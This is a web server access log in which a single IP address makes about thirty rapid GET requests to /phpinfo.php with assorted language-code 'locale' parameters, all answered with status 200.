45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=ko HTTP/1.1" 200 37604 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=id HTTP/1.1" 200 37408 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=nb HTTP/1.1" 200 37516 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=i_en HTTP/1.1" 200 37243 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=he HTTP/1.1" 200 37596 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=it HTTP/1.1" 200 37615 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=fr HTTP/1.1" 200 37818 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=uk HTTP/1.1" 200 37957 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=fil HTTP/1.1" 200 37507 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=hu HTTP/1.1" 200 37721 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=ja HTTP/1.1" 200 38002 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=ru HTTP/1.1" 200 38247 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=vi HTTP/1.1" 200 37666 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=sv HTTP/1.1" 200 37421 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:03 +0000] "GET /phpinfo.php?locale=pl HTTP/1.1" 200 37724 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:05 +0000] "GET /phpinfo.php?locale=el HTTP/1.1" 200 38400 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:05 +0000] "GET /phpinfo.php?locale=ar HTTP/1.1" 200 38229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:05 +0000] "GET /phpinfo.php?locale=cs HTTP/1.1" 200 37700 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:05 +0000] "GET /phpinfo.php?locale=en HTTP/1.1" 200 37269 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:05 +0000] "GET /phpinfo.php?locale=fi HTTP/1.1" 200 37572 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:07 +0000] "GET /phpinfo.php?locale=id HTTP/1.1" 200 37408 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:07 +0000] "GET /phpinfo.php?locale=pt HTTP/1.1" 200 37409 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:09 +0000] "GET /phpinfo.php?locale=hu HTTP/1.1" 200 37721 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:10 +0000] "GET /phpinfo.php?locale=th HTTP/1.1" 200 38732 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:11 +0000] "GET /phpinfo.php?locale=ko HTTP/1.1" 200 37604 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:11 +0000] "GET /phpinfo.php?locale=fr HTTP/1.1" 200 37818 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:11 +0000] "GET /phpinfo.php?locale=ja HTTP/1.1" 200 38002 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:11 +0000] "GET /phpinfo.php?locale=pl HTTP/1.1" 200 37724 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:11 +0000] "GET /phpinfo.php?locale=he HTTP/1.1" 200 37596 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:11 +0000] "GET /phpinfo.php?locale=vi HTTP/1.1" 200 37666 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
45.148.10.120 - - [02/Mar/2026:15:31:11 +0000] "GET /phpinfo.php?locale=sv HTTP/1.1" 200 37421 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
